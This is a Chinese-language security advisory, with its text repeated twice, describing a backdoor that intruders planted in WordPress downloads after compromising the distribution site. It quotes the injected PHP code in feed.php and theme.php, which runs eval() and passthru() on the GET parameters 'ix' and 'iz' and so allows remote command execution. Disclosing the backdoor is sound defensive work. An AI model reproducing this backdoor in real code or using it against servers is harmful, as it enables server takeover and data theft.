WordPress是一款免费的论坛Blog系统。 WordPress提供软件下载的网站被入侵,入侵者修改了软件代码码植入远程可执行命令的后门,远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。 被修改的文件是wp-includes/feed.php和wp-includes/theme.php,被添加了如下代码: 在wp-includes/feed.php文件中: function comment_text_phpfilter($filterdata) { eval($filterdata); } ... if ($_GET[\"ix\"]) { comment_text_phpfilter($_GET[\"ix\"]); } eval()调用会执行通过ix变量传入的PHP代码。 在wp-includes/theme.php文件中: function get_theme_mcommand($mcds) { passthru($mcds); } ... if ($_GET[\"iz\"]) { get_theme_mcommand($_GET[\"iz\"]); } passthru()会执行通过iz变量传入的PHP代码。
WordPress是一款免费的论坛Blog系统。 WordPress提供软件下载的网站被入侵,入侵者修改了软件代码码植入远程可执行命令的后门,远程攻击者可能利用这个后门以Web进程权限在安装了恶意版本WordPress的服务器上执行任意命令。 被修改的文件是wp-includes/feed.php和wp-includes/theme.php,被添加了如下代码: 在wp-includes/feed.php文件中: function comment_text_phpfilter($filterdata) { eval($filterdata); } ... if ($_GET[\"ix\"]) { comment_text_phpfilter($_GET[\"ix\"]); } eval()调用会执行通过ix变量传入的PHP代码。 在wp-includes/theme.php文件中: function get_theme_mcommand($mcds) { passthru($mcds); } ... if ($_GET[\"iz\"]) { get_theme_mcommand($_GET[\"iz\"]); } passthru()会执行通过iz变量传入的PHP代码。